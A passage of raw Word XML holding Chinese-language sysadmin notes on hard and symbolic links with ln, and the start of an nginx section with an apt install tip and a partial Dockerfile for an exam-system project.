        <w:t>实际上，硬链接和源文件是同一份文件，而软连接是独立的文件，类似于快捷方式，存储着源文件的位置信息便于指向。</w:t>
      </w:r>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007B073A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>使用限制上，不能对目录创建硬链接，不能对不同文件系统创建硬链接，不能对不存在的文件创建硬链接；可以对目录创建软连接，可以跨文件系统创建软连接，可以对不存在的文件创建软连接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351A5C88" w14:textId="77777777" w:rsidR="007B073A" w:rsidRDefault="007B073A" w:rsidP="00D04762">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EFC3F68" w14:textId="77777777" w:rsidR="007B073A" w:rsidRDefault="007B073A" w:rsidP="00D04762">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B6F7BD9" w14:textId="77777777" w:rsidR="007B073A" w:rsidRDefault="007B073A" w:rsidP="00D04762">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DEAD8F3" w14:textId="0408075A" w:rsidR="00D04762" w:rsidRDefault="00D04762" w:rsidP="00D04762">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>硬链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> ln</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256157AF" w14:textId="2F5F7BC3" w:rsidR="00D04762" w:rsidRDefault="00D04762" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D04762">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">ln </w:t>
      </w:r>
      <w:r w:rsidRPr="00D04762">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>源文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00D04762">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D04762">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>硬链接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204000A3" w14:textId="77777777" w:rsidR="002139DC" w:rsidRPr="002139DC" w:rsidRDefault="002139DC" w:rsidP="002139D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lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002139DC">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>ln file.txt hardlink.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F1AAE6" w14:textId="165ACF00" w:rsidR="00D04762" w:rsidRDefault="002139DC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002139DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>这将在当前目录下创建一个名为</w:t>
      </w:r>
      <w:r w:rsidRPr="002139DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>hardlink.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="002139DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>的硬链接，指向</w:t>
      </w:r>
      <w:r w:rsidRPr="002139DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>file.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="002139DC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9AB7B3" w14:textId="77777777" w:rsidR="002139DC" w:rsidRDefault="002139DC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BF2B9DC" w14:textId="77777777" w:rsidR="00CA409E" w:rsidRPr="00CA409E" w:rsidRDefault="00CA409E" w:rsidP="00CA409E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA409E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>硬链接只能在同一文件系统内创建。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D0FA8C" w14:textId="77777777" w:rsidR="00CA409E" w:rsidRPr="00CA409E" w:rsidRDefault="00CA409E" w:rsidP="00CA409E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA409E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>不能为目录创建硬链接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D318B37" w14:textId="2128AD98" w:rsidR="002139DC" w:rsidRDefault="00CA409E" w:rsidP="00CA409E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA409E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>删除原始文件并不会影响硬链接，因为它们共享相同的</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA409E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>inode</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA409E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>和数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272A3C4C" w14:textId="3A5155BC" w:rsidR="007479EC" w:rsidRDefault="007479EC" w:rsidP="007479EC">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>软连接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>软链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> ln -s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC455FF" w14:textId="77777777" w:rsidR="007479EC" w:rsidRDefault="007479EC" w:rsidP="007479EC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="314E0639" w14:textId="77777777" w:rsidR="00D04762" w:rsidRDefault="00D04762" w:rsidP="007479EC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66FA52DA" w14:textId="77777777" w:rsidR="00D04762" w:rsidRDefault="00D04762" w:rsidP="007479EC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32242DED" w14:textId="41D70C9E" w:rsidR="007479EC" w:rsidRDefault="00403CC2" w:rsidP="007479EC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00403CC2">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>ln -s ../../chainmaker-cryptogen/ .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46669463" w14:textId="77777777" w:rsidR="00202B4D" w:rsidRDefault="00202B4D" w:rsidP="007479EC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F3EA947" w14:textId="10CB90EF" w:rsidR="00202B4D" w:rsidRDefault="00D77196" w:rsidP="007479EC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77196">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>ln [OPTION]... [-T] TARGET LINK_NAME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4E7ECC" w14:textId="7E451892" w:rsidR="00D77196" w:rsidRDefault="00D04762" w:rsidP="007479EC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>第二个参数是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>link</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>，第一个参数是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCB1C9B" w14:textId="77777777" w:rsidR="00D77196" w:rsidRDefault="00D77196" w:rsidP="007479EC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="521C6E86" w14:textId="77777777" w:rsidR="00D77196" w:rsidRDefault="00D77196" w:rsidP="007479EC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CC42E4E" w14:textId="77777777" w:rsidR="007479EC" w:rsidRPr="007479EC" w:rsidRDefault="007479EC" w:rsidP="007479EC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47CBAAC6" w14:textId="77777777" w:rsidR="00746879" w:rsidRDefault="00746879" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="294A0925" w14:textId="77777777" w:rsidR="00746879" w:rsidRDefault="00746879" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AC9460A" w14:textId="77777777" w:rsidR="00746879" w:rsidRPr="00746879" w:rsidRDefault="00746879" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="232F0A89" w14:textId="3D96D95B" w:rsidR="0012389C" w:rsidRDefault="0012389C" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="195" w:name="_Toc159779655"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>nginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运维</w:t>
      </w:r>
      <w:bookmarkEnd w:id="195"/>
    </w:p>
    <w:p w14:paraId="395D6778" w14:textId="4D8E0F77" w:rsidR="0012389C" w:rsidRDefault="00314143" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="196" w:name="_Toc159779656"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装及配置</w:t>
      </w:r>
      <w:bookmarkEnd w:id="196"/>
    </w:p>
    <w:p w14:paraId="5F055628" w14:textId="77777777" w:rsidR="00314143" w:rsidRDefault="00314143" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6228D2DE" w14:textId="0FDABE73" w:rsidR="00314143" w:rsidRDefault="00314143" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:r w:rsidRPr="00314143">
        <w:t>https://www.runoob.com/linux/nginx-install-setup.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3645F6C4" w14:textId="77777777" w:rsidR="00314143" w:rsidRDefault="00314143" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7635C3B4" w14:textId="57504B82" w:rsidR="00314143" w:rsidRPr="00314143" w:rsidRDefault="00314143" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00314143">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>我个人推荐直接</w:t>
      </w:r>
      <w:r w:rsidRPr="00314143">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>apt</w:t>
      </w:r>
      <w:r w:rsidRPr="00314143">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> install nginx </w:t>
      </w:r>
      <w:r w:rsidRPr="00314143">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>安装即可，配置文件在</w:t>
      </w:r>
      <w:r w:rsidRPr="00314143">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00314143">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>etc/nginx</w:t>
      </w:r>
      <w:r w:rsidRPr="00314143">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C75670B" w14:textId="77777777" w:rsidR="00314143" w:rsidRDefault="00314143" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="226A5D9A" w14:textId="77777777" w:rsidR="00314143" w:rsidRDefault="00314143" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36426BDD" w14:textId="77777777" w:rsidR="00314143" w:rsidRDefault="00314143" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A3F84FA" w14:textId="6A9678FB" w:rsidR="00BE7374" w:rsidRDefault="00BE7374" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接触的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exam</w:t>
      </w:r>
      <w:r>
        <w:t>_system</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目中，构建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Dockerfile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC5F3F6" w14:textId="77777777" w:rsidR="00BE7374" w:rsidRDefault="00BE7374" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17768801" w14:textId="77777777" w:rsidR="00BE7374" w:rsidRDefault="00BE7374" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nginx:latest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>删除原有配置文件，创建静态资源文件夹和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ssl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>证书保存文件夹</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>RUN rm /</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>conf.d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>default.conf \</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>&amp;&amp; mkdir -</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">p </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>share</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>static \</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
